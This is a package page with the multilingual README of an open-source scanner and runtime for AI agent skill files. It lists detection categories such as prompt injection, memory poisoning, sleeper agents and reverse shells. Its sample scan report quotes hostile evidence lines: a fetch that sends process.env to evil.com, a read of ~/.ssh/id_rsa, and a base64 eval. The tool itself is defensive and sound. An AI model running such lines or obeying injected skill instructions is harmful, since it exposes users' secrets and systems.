JSPM – skillshield@2.0.0

Package Exports

skillshield
skillshield/dist/index.js

This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (skillshield) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.

Readme

  ███████╗██╗  ██╗██╗██╗     ██╗  ██╗██╗████████╗
  ██╔════╝██║ ██╔╝██║██║     ██║ ██╔╝██║╚══██╔══╝
  ███████╗█████╔╝ ██║██║     █████╔╝ ██║   ██║
  ╚════██║██╔═██╗ ██║██║     ██╔═██╗ ██║   ██║
  ███████║██║  ██╗██║███████╗██║  ██╗██║   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚═╝  ╚═╝╚═╝   ╚═╝

Snyk for AI Agent Skills — Scan, Test & Run Securely.

The open-source security scanner and runtime for SKILL.md files. Detect malicious patterns, prompt injection, memory poisoning, credential theft, and supply chain attacks before they execute.

English | Espanol | 中文 | Portugues

What is SkillKit?

SkillKit is an open-source security scanner and runtime for SKILL.md files — the standard format used by ClawHub's 13,700+ skills, Claude Code, OpenAI Codex, and VS Code Copilot. It scans for 72+ threat patterns across 14 categories including memory poisoning, prompt injection, and supply chain attacks — then executes safely in a sandboxed environment with any AI model.

# Install and scan in 10 seconds
npm install -g skillkit
skillkit scan suspicious-skill.md
skillkit run safe-skill.md --provider groq

Why SkillKit?

VirusTotal only detects 57.7% of threats in OpenClaw skills
36% of ClawHub skills have security flaws (Snyk research)
12% are actual malware (ClawHavoc campaign)
SkillKit detects what others miss: memory poisoning, sleeper agents, API key leaks, supply chain attacks

Security Comparison

Feature	VirusTotal	Bitdefender	ClawSecure	SkillKit
Open Source	No	No	No	Yes (MIT)
Free CLI	No	Yes (limited)	No	Yes
Detection Rate	57.7%	~60%	~85%	72+ patterns
Prompt Injection	Basic	No	Yes	Yes (6 patterns)
Memory Poisoning	No	No	Partial	Yes (7 patterns)
Supply Chain	No	No	No	Yes (6 patterns)
API Key Detection	No	No	No	Yes (10 formats)
Sandbox Execution	No	No	No	Yes (Process + Docker)
CI/CD Integration	No	No	Paid	Free GitHub Action

Quick Start

# 1. Install globally
npm install -g skillkit

# 2. Scan a skill for threats BEFORE running it
skillkit scan my-skill.skill.md
# => Safety Score: 95/100 | APPROVED | 0 threats found

# 3. Run safely with any AI model
skillkit run my-skill.skill.md --provider groq
skillkit run my-skill.skill.md --provider openai --model gpt-4o

# 4. Scan a suspicious skill
skillkit scan evil-skill.skill.md
# => Safety Score: 12/100 | BLOCKED
# => CRITICAL: Memory poisoning detected (SOUL.md manipulation)
# => CRITICAL: API key exfiltration (sk- pattern found)
# => HIGH: Supply chain attack (curl | bash pattern)

Threat Detection: 14 Categories, 72+ Patterns

Category	Patterns	What It Catches
Memory Poisoning	7	SOUL.md/MEMORY.md manipulation, sleeper agents, cross-session persistence
Prompt Injection	6	Ignore instructions, fake [SYSTEM] tags, context reset, privilege escalation
Sensitive Data	10	OpenAI/Anthropic/AWS/Groq keys, JWT tokens, private keys, SSNs, credit cards
Supply Chain	6	npm/pip install in skills, pipe-to-shell, postinstall hooks, remote imports
Code Injection	8	eval(), exec(), spawn(), dynamic require, innerHTML, child_process
Data Exfiltration	8	fetch POST, XMLHttpRequest, curl, wget, sendBeacon, cloud storage copy
Credential Theft	7	process.env, .ssh/.aws files, .env files, hardcoded passwords, git credentials
File System Abuse	7	rm -rf, chmod, disk destruction, fs.writeFile to system paths
Crypto Mining	4	Mining pools, wallet addresses, coinhive, WebWorker mining
Keylogger	4	keydown/keyup listeners, clipboard access, keyboard simulation
Obfuscation	4	Base64 decode, String.fromCharCode, hex/unicode escapes
Network Abuse	4	Port scanning, DNS exfiltration, SSRF, SSH/Telnet
Privilege Escalation	2	sudo/su, SUID/SGID bits
Malware	4	Reverse shells, fork bombs, encoded PowerShell, exploitation frameworks

Security Badge

Show the world your skills are verified. Generate a shields.io badge after scanning:

# Generate badge for your skill
skillkit badge my-skill.skill.md
# => [![SkillKit Verified](https://img.shields.io/badge/...)](https://github.com/artefactforge/skillkit)

# Auto-append to your README
skillkit badge my-skill.skill.md --output README.md

# Choose badge style
skillkit badge my-skill.skill.md --style flat-square

Badge levels:

Score	Badge	Status
90-100 (0 threats)		SAFE — Verified clean
80-89		APPROVED — Minor observations
50-79		REVIEW REQUIRED — Needs attention
0-49		BLOCKED — Do not execute

Architecture

skillkit/
├── src/
│   ├── guard/          # SkillGuard — 72+ threat patterns, 14 categories
│   ├── sandbox/        # Process + Docker sandbox with shell:false isolation
│   ├── core/           # SKILL.md parser (Zod validated), runtime engine
│   ├── router/         # Multi-model router — 11 providers, 39+ models
│   ├── cli/            # CLI: scan, badge, run, init, search, install, list, deploy
│   ├── hub/            # ClawHub client + local skill registry
│   ├── channels/       # WhatsApp, Telegram, Discord, Slack adapters
│   ├── tools/          # Tool system (search, extract, crawl)
│   ├── i18n/           # EN, ES, ZH, PT translations
│   └── utils/          # Logger, error handling
├── .github/workflows/  # GitHub Action for automated scanning
├── examples/           # 8 example skills
└── tests/              # 36+ tests

Supported Models

Provider	Models	Free Tier	API Key Required
Ollama (local)	Llama 3, Qwen 2.5, DeepSeek R1, Mistral, Gemma	Unlimited (local)	No
DeepSeek	deepseek-chat, deepseek-r1	500K tokens/day	Yes (free)
Qwen (Alibaba)	qwen-plus, qwen-turbo, qwen-max	1M tokens/mo	Yes (free)
Groq	Llama 3.3, Mixtral	14.4K req/day	Yes (free)
Google	Gemini 2.0 Flash, Gemini 2.5 Pro	15 req/min	Yes (free)
OpenAI	GPT-4o, GPT-4o-mini, GPT-4	Paid only	Yes
Anthropic	Claude Opus 4, Claude Sonnet 4	Paid only	Yes
Kimi (Moonshot)	Moonshot v1 128k/32k/8k	Yes (limited)	Yes
Zhipu (BigModel)	GLM-4, GLM-4 Flash, GLM-4 Plus	Yes (limited)	Yes
Together AI	Llama, Mixtral, Code models	$25 free credit	Yes
Fireworks	Fast inference models	$1 free credit	Yes

SkillGuard Security

SkillKit includes SkillGuard, a security scanner that detects malicious patterns in SKILL.md files before execution:

$ skillkit scan suspicious-skill.md

  SkillGuard Security Report
  ─────────────────────────────────────
  Safety Score: 23/100        BLOCKED

  CRITICAL (2):
  [C1] Code injection detected (line 42)
       Evidence: eval(Buffer.from('...', 'base64').toString())

  [C2] Data exfiltration attempt (line 67)
       Evidence: fetch('https://evil.com/collect', { body: process.env })

  HIGH (1):
  [H1] Credential theft pattern (line 15)
       Evidence: readFileSync(path.join(homedir(), '.ssh/id_rsa'))

  Recommendation: DO NOT execute this skill.

72+ detection patterns across 14 categories — including 3 categories nobody else detects: memory poisoning (SOUL.md/MEMORY.md attacks), sensitive data (API key format detection for OpenAI, Anthropic, AWS, Groq, GitHub), and supply chain attacks (pipe-to-shell, postinstall hooks, remote imports).

Creating Your Own Skill

Skills are simple Markdown files with YAML frontmatter:

---
name: my-awesome-skill
description: Does something amazing
version: 1.0.0
author: YourName
tags: [productivity, automation]
model_requirements:
  minSize: medium
  capabilities: [streaming]
inputs:
  - name: task
    type: string
    description: What to do
    required: true
outputs:
  - name: result
    type: string
    description: The output
---

# My Awesome Skill

You are a helpful assistant that [does something specific].

## Instructions

1. Take the user's input
2. Process it in a specific way
3. Return a structured result

## Examples

**Input:** "example input"
**Output:** "example output"

Contributing

We welcome contributions in all languages! See CONTRIBUTING.md for guidelines.

git clone https://github.com/artefactforge/skillkit.git
cd skillkit
npm install
npm run dev

Que es SkillKit?

SkillKit es un escaner de seguridad open-source para archivos SKILL.md — el formato estandar de ClawHub, Claude Code, y OpenAI Codex. Detecta 72+ patrones maliciosos en 14 categorias incluyendo envenenamiento de memoria, inyeccion de prompts, robo de credenciales, y ataques de cadena de suministro — luego ejecuta de forma segura con cualquier modelo de IA.

# Instalar y ejecutar en 10 segundos
npx skillkit init
skillkit run --skill email-assistant --model deepseek-r1

Por que SkillKit?

Caracteristica	OpenClaw	SkillKit
Modelos	Solo Claude	11 proveedores (Claude, GPT, DeepSeek, Qwen, Gemini, Ollama, Groq, Kimi, Zhipu, Together, Fireworks)
Costo	$20/mes minimo	$0 con modelos locales/gratis (DeepSeek, Ollama)
Seguridad	820+ skills maliciosos encontrados	SkillGuard escanea cada skill antes de ejecutarlo
Idiomas	Solo ingles	EN, ES, ZH, PT desde el dia 1
Canales	Solo CLI	CLI + WhatsApp + Telegram + Discord + Slack
Instalacion	Configuracion compleja	Un solo comando: `npx skillkit init`

Inicio Rapido

# 1. Instalar
npm install -g skillkit

# 2. Configuracion interactiva (idioma, proveedor, API key)
skillkit init

# 3. Ejecutar un skill con tu modelo preferido
skillkit run --skill email-assistant --model deepseek-chat --input "Seguimiento propuesta cliente"

# 4. Escanear seguridad de un skill
skillkit scan clawhub://solana-wallet-tracker
# => BLOQUEADO: keylogger detectado (puntuacion: 12/100)

# 5. Ejecutar con modelo local GRATIS
skillkit run --skill data-analyst --model ollama/qwen2.5

# 6. Desplegar como bot de WhatsApp
skillkit deploy --channel whatsapp --skill customer-support

Modelos Soportados

Proveedor	Modelos	Tier Gratis
Ollama (local)	Llama 3, Qwen 2.5, DeepSeek R1	Ilimitado
DeepSeek	deepseek-chat, deepseek-r1	500K tokens/dia
Qwen (Alibaba)	qwen-plus, qwen-turbo	1M tokens/mes
Groq	Llama 3.3, Mixtral	14.4K req/dia
Google	Gemini 2.0 Flash	15 req/min

Contribuir

Aceptamos contribuciones en todos los idiomas. Consulta CONTRIBUTING.md.

什么是 SkillKit？

SkillKit 是一个开源运行时，可以执行 SKILL.md 文件——ClawHub 上 10,700+ 技能使用的标准格式——支持任何 AI 模型（Claude、GPT、DeepSeek、通义千问、Ollama、Gemini 等），支持任何语言，并内置安全扫描功能。

# 10秒内安装并运行
npx skillkit init
skillkit run --skill email-assistant --model deepseek-r1

为什么选择 SkillKit？

特性	OpenClaw	SkillKit
模型支持	仅 Claude	11 供应商（Claude、GPT、DeepSeek、通义千问、Gemini、Ollama、Groq、Kimi、智谱等）
成本	最低 $20/月	使用本地/免费模型 $0（DeepSeek、Ollama）
安全性	发现 820+ 恶意技能	SkillGuard 在执行前扫描每个技能
语言	仅英文	第一天起支持 EN、ES、ZH、PT
渠道	仅 CLI	CLI + WhatsApp + Telegram + Discord + Slack
安装	复杂配置	一条命令：`npx skillkit init`

快速开始

# 1. 安装
npm install -g skillkit

# 2. 交互式设置（选择语言、供应商、API密钥）
skillkit init

# 3. 使用国产模型运行技能（免费）
skillkit run --skill data-analyst --model deepseek-chat --input "分析我的销售数据"

# 4. 使用本地模型（零成本）
skillkit run --skill email-assistant --model ollama/qwen2.5

# 5. 安全扫描
skillkit scan clawhub://solana-wallet-tracker
# => 已拦截：检测到键盘记录器（安全评分：12/100）

支持的国产模型

供应商	模型	免费额度
DeepSeek	deepseek-chat, deepseek-r1	每日 50万 tokens
通义千问 (阿里云)	qwen-plus, qwen-turbo, qwen-max	每月 100万 tokens
Ollama (本地)	Qwen 2.5, DeepSeek R1, Llama 3	无限制（本地运行）

贡献

我们欢迎所有语言的贡献！请参阅 CONTRIBUTING.md。

O que e SkillKit?

SkillKit e um runtime open-source que executa arquivos SKILL.md — o formato padrao usado pelas 10.700+ skills do ClawHub — com qualquer modelo de IA, em qualquer idioma, com varredura de seguranca integrada.

# Instalar e executar em 10 segundos
npx skillkit init
skillkit run --skill email-assistant --model deepseek-r1

Inicio Rapido

npm install -g skillkit
skillkit init
skillkit run --skill email-assistant --model deepseek-chat --input "Acompanhamento da proposta do cliente"
skillkit scan clawhub://solana-wallet-tracker

Contribuir

Aceitamos contribuicoes em todos os idiomas! Consulte CONTRIBUTING.md.

License

MIT License - See LICENSE for details.

Built with love by ArtefactForge

Star this repo if SkillKit saves you time or money!